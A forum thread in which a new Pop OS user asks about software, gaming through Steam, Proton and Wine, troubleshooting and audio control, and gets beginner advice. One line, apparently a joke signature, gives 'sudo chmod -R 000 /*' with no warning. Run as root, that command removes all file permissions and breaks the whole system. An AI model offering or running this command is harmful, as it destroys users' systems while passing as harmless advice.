Pop OS

so i just install linux cause the new video and want to actually try 1 but unsure of it. so my question is, what's to install when you use linux? i mainly browse the internet and play dota 2 and CSGO. and how to troubleshoot 1 if there is some problems with Pop OS (Linux?)

2 minutes ago, Oalei said:

so i just install linux cause the new video and want to actually try 1 but unsure of it. so my question is, what's to install when you use linux? i mainly browse the internet and play dota 2 and CSGO. and how to troubleshoot 1 if there is some problems with Pop OS (Linux?)

You can run most linux distros off of a USB stick, so just download the image, write it to a USB stick (with the software that was recommended in the video) and boot your PC off of the stick.

You should be able to connect to the internet as per usual, if you want to play games you'll either have to install steam and download the games, which you can (if possible) play natively, with Steam's own Proton, wine or the other launcher that was mentioned (I forgot the name).

Troubleshooting is a bit easier to explain and do once there is an actual specific problem, but you usually get very descriptive error codes or the logs will tell you what exactly went wrong, so that's usually the jump off point

75% of what I say is sarcastic

So is the rest probably

2 minutes ago, myselfolli said:

You can run most linux distros off of a USB stick, so just download the image, write it to a USB stick (with the software that was recommended in the video) and boot your PC off of the stick.

You should be able to connect to the internet as per usual, if you want to play games you'll either have to install steam and download the games, which you can (if possible) play natively, with Steam's own Proton, wine or the other launcher that was mentioned (I forgot the name).

Troubleshooting is a bit easier to explain and do once there is an actual specific problem, but you usually get very descriptive error codes or the logs will tell you what exactly went wrong, so that's usually the jump off point

ok i already got it install and only know just wine at the moment. how about drivers update will there be 1 from the Pop OS or just install the linux version in general? ok so i just run into some real problem, what app to use when you want to control your sound system (speaker disabling or enabling and so on).

2 hours ago, Oalei said:

ok so i just run into some real problem, what app to use when you want to control your sound system (speaker disabling or enabling and so on).

Pulseaudio is the program that handles audio in most distributions, there are a few GUIs for it and pop os probably has its own. Look for an icon that looks like a speaker in the task bar or open the system settings utility and look for audio.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

What video you talking about? Can you link it?

Sudo make me a sandwich 

7 hours ago, Sauron said:

Pulseaudio is the program that handles audio in most distributions, there are a few GUIs for it and pop os probably has its own. Look for an icon that looks like a speaker in the task bar or open the system settings utility and look for audio.

That thing doesn't help,but I already know how now. Nvm different apos

4 hours ago, wasab said:

What video you talking about? Can you link it?

The new 1 from Linus Tech tips, the Microsoft should be really afraid 

Edited by Oalei

52 minutes ago, Oalei said:

That thing doesn't help,but I already know how now. Nvm different apos

The new 1 from Linus Tech tips, the Microsoft should be really afraid 

That video is better than the previous two. First one is too technical, 2nd is the exact opposite as if done by someone who doesn't know what he is doing. 

This third is about right. Although I don't know why they talked about pop OS and Manjaro so much. Pop OS looks pretty which is why I have it as my theme on Ubuntu but it's hardly any more different than Ubuntu. 

Sudo make me a sandwich 

5 hours ago, wasab said:

That video is better than the previous two. First one is too technical, 2nd is the exact opposite as if done by someone who doesn't know what he is doing. 

This third is about right. Although I don't know why they talked about pop OS and Manjaro so much. Pop OS looks pretty which is why I have it as my theme on Ubuntu but it's hardly any more different than Ubuntu. 

Well, either way it's fine I like the interface anyway